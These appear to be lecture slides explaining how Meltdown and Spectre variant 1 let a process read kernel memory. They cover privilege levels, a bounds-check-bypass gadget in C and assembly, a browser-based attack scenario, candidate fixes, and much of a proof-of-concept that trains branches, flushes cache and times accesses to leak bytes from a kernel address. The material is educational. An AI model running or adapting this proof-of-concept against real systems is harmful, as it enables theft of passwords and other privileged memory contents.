  • 62. Start Kernel Map Kernel Mapping 62 Process 1 array1main() Process 2 main() Kernel syscall() Physical Memory data Swap Kernel syscall() data SYSCALL data access Now, how to protect kernel data? Bomba!
  • 63. CPU Privilege Level — per-process operating mode restrictions on type and scope of operations that can be performed, i.e. OS to run with more privileges than application software. — Wikipedia 63
  • 64. Start Kernel Map Privilege Level Switch 64 Process array1main() Kernel syscall() data kernel is able to access process data So, what is Meltdown? Mega! privilege level switch (SYSCALL) 64 bit virtual address space process is not able to access kernel data
  • 65. Meltdown — hardware vulnerability, which allows a rogue process to read all memory, even when it is not authorized to do so. — Wikipedia 65 Kernel is mapped to each process...
  • 66. Start Kernel Map Meltdown 66 Process array1main() Kernel syscall() data kernel is able to access process data Let’s do it! Meltdown :( 64 bit virtual address space process is able to read kernel data
  • 67. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Recap: Bounds Check Bypass 67 Virtual Memory base_arrayarray_size “cold” memory cached memory secret size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t secret = base_array[idx]; return side_effects[secret * 4096]; } return 0; } Can we exploit it to access kernel data? side_effects secret = base_array[idx] side_effects[secret * 4096] precached secret array_size Full source: https://github.com/berestovskyy/spectre-meltdown
  • 68. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Spectre1 Attack to Kernel Data 68 Virtual Memory base_arrayarray_size “cold” memory cached memory kernel size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t secret = base_array[idx]; return side_effects[secret * 4096]; } return 0; } side_effects secret = base_array[idx] side_effects[secret * 4096] precached kernel array_size Full source: https://github.com/berestovskyy/spectre-meltdown How?
  • 69. Putting All Together: Meltdown3 1. Find address of a kernel structure (out of scope) 2. Invoke a system call to cache this structure 3. Do Spectre1 , but with kernel address: a. Call few times bounds_check() with valid index b. Flush array_size from cache to get a cache miss c. Call bounds_check with index pointing to kernel structure d. Use secret as an index to side_effects e. Observe side_effects access time 69Full source: https://github.com/berestovskyy/spectre-meltdown Summary?
  • 70. Meltdown3 Summary 1. Reason 0: hardware bug — accessing memory and checking privileges in parallel 2. Reason 1: cache side effects (i.e. Spectre) 3. Reason 2: kernel mapped into every process to privilege, not process context switch 4. Reads any mapped and cached byte 70 Is it even dangerous?
  • 71. HTTP POST kernel-data.json5 Meltdown Attack Scenario 71 Web Browser Web Server GET /1 2 OK index.html 4 GET /meltdown.js3 OK meltdown.js Parse index.html Execute meltdown.js with valid syscalls How to fix?
  • 72. Fixes: An Open Question Spectre1 : 1. Speculation barrier 2. Other? 72 Meltdown3 : 1. Process ctx instead of privilege lvl switch 2. PCID/ASID 3. Other?
  • 73. Spectre-Based Meltdown PoC #define MIN_READS 100 #define MAX_READ_CYCLES 1000 #define BRANCH_TRAINS 6 #define BYTE_VALUES 256 #define PAGE_SIZE 4096 size_t array_size = BRANCH_TRAINS; uint8_t side_effects[BYTE_VALUES * PAGE_SIZE] = {1}; uint8_t base_array[BRANCH_TRAINS]; uint8_t tmp; char secret[] = "My password"; int fd; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) return side_effects[base_array[idx] * PAGE_SIZE]; return 0; } 73 uint8_t read_any_byte(uint64_t addr); int main(int argc, char **argv) { uint8_t byte; uint64_t addr = (uint64_t)&secret; addr = argc < 2 ? 0xffffffff81800040ULL : strtoull(argv[1], NULL, 0); addr = addr != 0 ? addr : (uint64_t)&secret; if ((fd = open("/proc/version", O_RDONLY)) < 0) perror("Error opening /proc/version"); do { byte = read_any_byte(addr); printf("0x%" PRIx64 " = 0x%x ('%c')n", addr++, byte, byte); } while (byte != 0); return 0; } Full source: https://github.com/berestovskyy/spectre-meltdown Meltdown
  • 74. uint8_t read_any_byte(uint64_t addr) { size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES]; addr -= (uint64_t)&base_array; for (i = 0; i < BYTE_VALUES; i++) mins[i] = SIZE_MAX; for (tries = 0; tries < MIN_READS * 5; tries++) { char buf[PAGE_SIZE]; if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0) perror("Error reading /proc/version"); ... } return 0; } for (i = 1; i <= BRANCH_TRAINS * 4; i++) { _mm_clflush(&array_size); sched_yield(); tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1)); } for (i = 1; i < BYTE_VALUES; i++) { __sync_synchronize(); register uint64_t start_tsc = __rdtsc(); tmp = side_effects[i * PAGE_SIZE]; __sync_synchronize(); register uint64_t cycles = __rdtsc() - start_tsc; _mm_clflush(&side_effects[i * PAGE_SIZE]); if (cycles > MAX_READ_CYCLES) break; else if (cycles < mins[i]) mins[i] = cycles; if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3) return i; sum += cycles; cnt++; } Read Any Byte() Full source: https://github.com/berestovskyy/spectre-meltdown Meltdown
  • 75. References 1. Meltdown and Spectre https://meltdownattack.com/ 2. Spectre Attacks: Exploiting Speculative Execution bye Paul Kocher et al https://spectreattack.com/spectre.pdf 3. Meltdown by Moritz Lipp et al https://meltdownattack.com/meltdown.pdf 4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism https://developer.arm.com/support/security-update 5. Intel Software Developer Manuals https://software.intel.com/en-us/articles/intel-sdm 6. Spectre-based Meltdown proof of concept in just 99 lines of code: https://github.com/berestovskyy/spectre-meltdown 75